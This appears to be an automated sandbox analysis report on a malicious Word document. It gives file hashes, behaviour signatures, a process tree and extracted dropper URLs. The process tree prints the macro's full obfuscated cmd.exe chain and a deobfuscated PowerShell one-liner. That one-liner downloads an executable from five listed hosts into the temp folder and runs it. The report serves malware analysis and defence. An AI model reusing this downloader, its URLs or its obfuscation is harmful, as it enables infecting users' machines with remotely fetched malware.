Analysis

  • max time kernel
    143s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 14:38

General

  • Target

    63a518c1acfaa38b3b7fb4603fcb6702_JaffaCakes118.doc

  • Size

    357KB

  • MD5

    63a518c1acfaa38b3b7fb4603fcb6702

  • SHA1

    8b84d41f94e21d322d68584be75fefc4c839b67d

  • SHA256

    7c698d56be5392b5c0735023c7fd1a9db1cc7e4e0e05d3c233db80af005b6c2d

  • SHA512

    a548fd848573e50b8fbadb6752d6456d410fae191dc10963d3762332d6853e980e25003ca734e13d57882ffaff0a3c4ed4491eca9135c5f1ec7afcf4f633e768

  • SSDEEP

    6144:PxjFSdDqxP1Ow5lKWyipxTK5YWofTLrrneNq52vOytu:NFSpsgw5sWyqA58/rDes0O6u

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://siamgemsheritage.com/backup3/wp-content/plugins/all-in-one-wp-migration/storage/uFb6zI7y

exe.dropper

http://stellandina.cl/gq8syuB5

exe.dropper

http://www.spor.advertisetr.com/nLIM

exe.dropper

http://fltstatus.com/y

exe.dropper

http://website.vtoc.vn/nhahanglamduong/wp-content/uploads/j

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\63a518c1acfaa38b3b7fb4603fcb6702_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c ^fOR , /f , " delims=Pf tokens= 1 " ; ; %^c , in , ( , ; ' , ; F^^TyPe , , ^| ; ^^fInDstr , ^^md^^f ' , , ) , ; ^do ; ; %^c; , ; tTKEjwWa^/V^3*NW^ , 7KxSdM/R " ; , (sE^t _\^`=m-M^)^ k+7n^2,^G^oWt$^yIq^jis@=.u^ez:^FBafg0S}{8w/^;5L'VdRbcpD^(ClhPZr3xN^6^\J^vQ)&& , ; F^O^r ; %^v , iN ; ; ( ^ +50 +1^2 ; ^ 39 ^; ; ^ ^26 58 21^ ;^ 55 ^ 26 54 ^ ^+54^ 4 15 65 6^1 ^, ^ 45 23 ^ ^,^ 8 2^6 39^ 1 1^2 , ,^ ^4^8 19^ , ^, 26 ^ 49 ^14 4^ ^61 26 14 ^, 24 1^3^ +2^6 ^; 48^ 53 ^ +^54^ ; 20 26 ^+8 ^ 14 +4^1^ ; 15^ , ^ , 4^8 6^6 +4^3^ ^, , 23 4^4 5^5 +1^4 ; ^ 14 , ^ +50^ ; 28 ^ ^40 40^ ^ ^21 20^ , 31 0 +33 26 0 , , ^21 ^, , 55 +2^6^ ^ 58 ^20 ^14 , 31^ 33 ^ +26 +24 4^9^ 1^2 -0 ;^ 40 48 ^+31 49 5 +2^5 ; ; ^ 50 ; 59 ^, ,^ 40^ ; 3^9 50 ^ 1 ; ^ ; 49 +12 ^ 8 , ^ , 14 26 ^ ;^ ^8 14^ ^ 40 , ^, +5^0 +54 25^ ; 33 ^+2^0^ ^ 8^ 21 ^40 ; 31 54 54 1 ^ ^+20 ,^ ,^ 8 ; ^ +^1 1^2 +8 +26 , 1 39 , 50 ;^ ; 1 ^ ^0 ; ; 20 ^; 33 +^58 3^1^ ^14^ 20 12 , ^ ,^ +8 ^ 40 ^21 ^+^14 +12 5^8 31^ 33^ ^26 ^;^ 40^ 25 29 48 ^62 , ,^ 27 17 +7^ ^ 16 ^,^ ,^ 22 ^55^ 14 14 5^0 ^+^28 40 40 ^ ^+21 ^ , , 14 ^26 54 54 31 , ^ 8 46 ^+20 , , 8 +31^ ^ +24 +49 ^ +54 4^0 3^3^ +18 38^ 21^ 16 ^ ; ^ ;^ ^ 25 30 ;^ ; ^ +^42 +22 ;^ ^ ;^ 55 1^4 , 14 50 28^ 40^ ^40 , ,^ ^ 3^9 +39 ; 39 ^ , 24 +21 ^5^0^ 12 +58 24 31 46 6^5 , , +26^ 58 +14 ; ^20 21 , ^ ,^ 26 ^14 58 24 ^4^9 +1^2 ^ 0 40 +8 4^3 +17 , 2 ^22 ; ^ ; 55 , 14^ 14 ^; 5^0 28 40^ 40 ^+32 ; ^ ^;^ ^ ^+54 ; ; +14 21 , ^ 14 ^31 14^ +25 , , 21 24 ;^ ^ +49^ ^ ; 12 0 40^ 16 22 5^5 ^ ^14 ^ 14 50^ 28 , +^4^0 +^40 3^9 ^ , , +26 ^4^8 2^1^ ^20 14 26 2^4 , ^ +65 1^4 12 4^9 ; ; +^24 65^ 8^ ^ +40 ^ 8 55 31 ^55 31 +8 ^, , 33 ^ 54 3^1^ 0 ^ 4^6 25^ ^ ; ^; 12 ; +8 33 ^ ^40 39 50 ^ 1^ ^ ^49 ,^ , 12 +8 ; 1^4 2^6 8^ ^ ^14 ; ^; 40 +^25 ^ 50 54 , ,^ ^ 12 31 46 21 40 19 44 24 35 ^50^ ^ 54 20 ^14 52 ^ 44 22 , +^44 +3 4^1 1^5^ 39^ , ^ 39 , , ^64 ^ ^+4 23 4 +44 +^9 ^ 34 ^ 38 4^4 +^41 15 ^ ^;^ ^; +47 ^+11^ ^; ^ 57^ 23 ^ ^15 ^, ^, ^+^26 8 65 28 +1^4^ ^26 0^ +50 6 ^ 44^ , +63 44^ ; +6^ 15 39 +39 64 ;^ ^; ^6 44 ;^ ^ 24 ^26 ^60^ ; ; +26^ 44 ^ ^, 41 32 ^ +12 ^ 58^ ^26 31^ ^ 49 5^5 ; ; 52 ; ;^ ^ ^15 39 , ^ 46 , 45 ^ ,^ ^, +4 20 ^8 ^ ^ 4 ^ 15 48 6^6^ +^43 +3 +37 ; ^ 1^4^ 5^8 16 , 37 ^15 65 61 ^ ^45 +2^4 ^ 5^1^ , 1^2 ^39 ^ 8 54 12 3^1 ^ 4^6 29 +20 ; 54 26^ ^5^2 15 39 +46 45^ ^1^0 +4 , , 15 ; ; +^47 1^1^ 57 3 +41 35 14 +^3^1 58 +14 1 5^6^ , 58 ; ^; ^12 ^; +^49 26 21 21 4 15 ;^ 47^ ; 11 ^ 57 ^ ^4^1^ +^4^8^ +^58 2^6 ^; 31 5^ , , 41 36 +49 ^ 31 ^, ^14 ^ 49 ^; 5^5 ^+37 36 , , 36 ^+4 ^ ^ ^; 4 4 4 4 4 ; 4 4 ,^ 4^ +4 , ^, +4 ; ^ ^; ^4 ^ 4 +4 4^ 4^ ^+4 , 74 ^; ) ; ; ^dO (^SEt ^$`'=!^$`'!!_\^`:~ %^v, 1!)& ; ^if ; %^v ; e^Qu ; ; ^7^4 ; , ( (CaL^l , ; %^$`':*$`'!^=%) , ; , ; , ) "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c F^TyPe | ^fInDstr ^md^f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" FTyPe "
          4⤵
            PID:1944
          • C:\Windows\system32\findstr.exe
            fInDstr mdf
            4⤵
              PID:1624
          • C:\Windows\system32\cmd.exe
            cmd ; , ; tTKEjwWa/V3*NW , 7KxSdM/R " ; , (sE^t _\^`=m-M^)^ k+7n^2,^G^oWt$^yIq^jis@=.u^ez:^FBafg0S}{8w/^;5L'VdRbcpD^(ClhPZr3xN^6^\J^vQ)&& , ; F^O^r ; %^v , iN ; ; ( ^ +50 +1^2 ; ^ 39 ^; ; ^ ^26 58 21^ ;^ 55 ^ 26 54 ^ ^+54^ 4 15 65 6^1 ^, ^ 45 23 ^ ^,^ 8 2^6 39^ 1 1^2 , ,^ ^4^8 19^ , ^, 26 ^ 49 ^14 4^ ^61 26 14 ^, 24 1^3^ +2^6 ^; 48^ 53 ^ +^54^ ; 20 26 ^+8 ^ 14 +4^1^ ; 15^ , ^ , 4^8 6^6 +4^3^ ^, , 23 4^4 5^5 +1^4 ; ^ 14 , ^ +50^ ; 28 ^ ^40 40^ ^ ^21 20^ , 31 0 +33 26 0 , , ^21 ^, , 55 +2^6^ ^ 58 ^20 ^14 , 31^ 33 ^ +26 +24 4^9^ 1^2 -0 ;^ 40 48 ^+31 49 5 +2^5 ; ; ^ 50 ; 59 ^, ,^ 40^ ; 3^9 50 ^ 1 ; ^ ; 49 +12 ^ 8 , ^ , 14 26 ^ ;^ ^8 14^ ^ 40 , ^, +5^0 +54 25^ ; 33 ^+2^0^ ^ 8^ 21 ^40 ; 31 54 54 1 ^ ^+20 ,^ ,^ 8 ; ^ +^1 1^2 +8 +26 , 1 39 , 50 ;^ ; 1 ^ ^0 ; ; 20 ^; 33 +^58 3^1^ ^14^ 20 12 , ^ ,^ +8 ^ 40 ^21 ^+^14 +12 5^8 31^ 33^ ^26 ^;^ 40^ 25 29 48 ^62 , ,^ 27 17 +7^ ^ 16 ^,^ ,^ 22 ^55^ 14 14 5^0 ^+^28 40 40 ^ ^+21 ^ , , 14 ^26 54 54 31 , ^ 8 46 ^+20 , , 8 +31^ ^ +24 +49 ^ +54 4^0 3^3^ +18 38^ 21^ 16 ^ ; ^ ;^ ^ 25 30 ;^ ; ^ +^42 +22 ;^ ^ ;^ 55 1^4 , 14 50 28^ 40^ ^40 , ,^ ^ 3^9 +39 ; 39 ^ , 24 +21 ^5^0^ 12 +58 24 31 46 6^5 , , +26^ 58 +14 ; ^20 21 , ^ ,^ 26 ^14 58 24 ^4^9 +1^2 ^ 0 40 +8 4^3 +17 , 2 ^22 ; ^ ; 55 , 14^ 14 ^; 5^0 28 40^ 40 ^+32 ; ^ ^;^ ^ ^+54 ; ; +14 21 , ^ 14 ^31 14^ +25 , , 21 24 ;^ ^ +49^ ^ ; 12 0 40^ 16 22 5^5 ^ ^14 ^ 14 50^ 28 , +^4^0 +^40 3^9 ^ , , +26 ^4^8 2^1^ ^20 14 26 2^4 , ^ +65 1^4 12 4^9 ; ; +^24 65^ 8^ ^ +40 ^ 8 55 31 ^55 31 +8 ^, , 33 ^ 54 3^1^ 0 ^ 4^6 25^ ^ ; ^; 12 ; +8 33 ^ ^40 39 50 ^ 1^ ^ ^49 ,^ , 12 +8 ; 1^4 2^6 8^ ^ ^14 ; ^; 40 +^25 ^ 50 54 , ,^ ^ 12 31 46 21 40 19 44 24 35 ^50^ ^ 54 20 ^14 52 ^ 44 22 , +^44 +3 4^1 1^5^ 39^ , ^ 39 , , ^64 ^ ^+4 23 4 +44 +^9 ^ 34 ^ 38 4^4 +^41 15 ^ ^;^ ^; +47 ^+11^ ^; ^ 57^ 23 ^ ^15 ^, ^, ^+^26 8 65 28 +1^4^ ^26 0^ +50 6 ^ 44^ , +63 44^ ; +6^ 15 39 +39 64 ;^ ^; ^6 44 ;^ ^ 24 ^26 ^60^ ; ; +26^ 44 ^ ^, 41 32 ^ +12 ^ 58^ ^26 31^ ^ 49 5^5 ; ; 52 ; ;^ ^ ^15 39 , ^ 46 , 45 ^ ,^ ^, +4 20 ^8 ^ ^ 4 ^ 15 48 6^6^ +^43 +3 +37 ; ^ 1^4^ 5^8 16 , 37 ^15 65 61 ^ ^45 +2^4 ^ 5^1^ , 1^2 ^39 ^ 8 54 12 3^1 ^ 4^6 29 +20 ; 54 26^ ^5^2 15 39 +46 45^ ^1^0 +4 , , 15 ; ; +^47 1^1^ 57 3 +41 35 14 +^3^1 58 +14 1 5^6^ , 58 ; ^; ^12 ^; +^49 26 21 21 4 15 ;^ 47^ ; 11 ^ 57 ^ ^4^1^ +^4^8^ +^58 2^6 ^; 31 5^ , , 41 36 +49 ^ 31 ^, ^14 ^ 49 ^; 5^5 ^+37 36 , , 36 ^+4 ^ ^ ^; 4 4 4 4 4 ; 4 4 ,^ 4^ +4 , ^, +4 ; ^ ^; ^4 ^ 4 +4 4^ 4^ ^+4 , 74 ^; ) ; ; ^dO (^SEt ^$`'=!^$`'!!_\^`:~ %^v, 1!)& ; ^if ; %^v ; e^Qu ; ; ^7^4 ; , ( (CaL^l , ; %^$`':*$`'!^=%) , ; , ; , ) "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $vNV=new-object Net.WebClient;$bQL='http://siamgemsheritage.com/backup3/wp-content/plugins/all-in-one-wp-migration/storage/uFb6zI7y@http://stellandina.cl/gq8syuB5@http://www.spor.advertisetr.com/nLIM@http://fltstatus.com/y@http://website.vtoc.vn/nhahanglamduong/wp-content/uploads/j'.Split('@');$wwJ = '208';$RGZ=$env:temp+'\'+$wwJ+'.exe';foreach($wdV in $bQL){try{$vNV.DownloadFile($wdV, $RGZ);Start-Process $RGZ;break;}catch{}}
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3640

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdfncfk0.0ya.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

        Filesize

        245KB

        MD5

        f883b260a8d67082ea895c14bf56dd56

        SHA1

        7954565c1f243d46ad3b1e2f1baf3281451fc14b

        SHA256

        ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

        SHA512

        d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

      • memory/2944-8-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-9-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-0-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-19-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-6-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-7-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-2-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-20-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-13-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-12-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-14-0x00007FF7F1D00000-0x00007FF7F1D10000-memory.dmp

        Filesize

        64KB

      • memory/2944-11-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-10-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-17-0x00007FF7F1D00000-0x00007FF7F1D10000-memory.dmp

        Filesize

        64KB

      • memory/2944-16-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-18-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-5-0x00007FF8344CD000-0x00007FF8344CE000-memory.dmp

        Filesize

        4KB

      • memory/2944-3-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-15-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-52-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-53-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-583-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-4-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-1-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-554-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-555-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-556-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-557-0x00007FF834430000-0x00007FF834625000-memory.dmp

        Filesize

        2.0MB

      • memory/2944-580-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-579-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-581-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/2944-582-0x00007FF7F44B0000-0x00007FF7F44C0000-memory.dmp

        Filesize

        64KB

      • memory/3640-54-0x00000217ED350000-0x00000217ED372000-memory.dmp

        Filesize

        136KB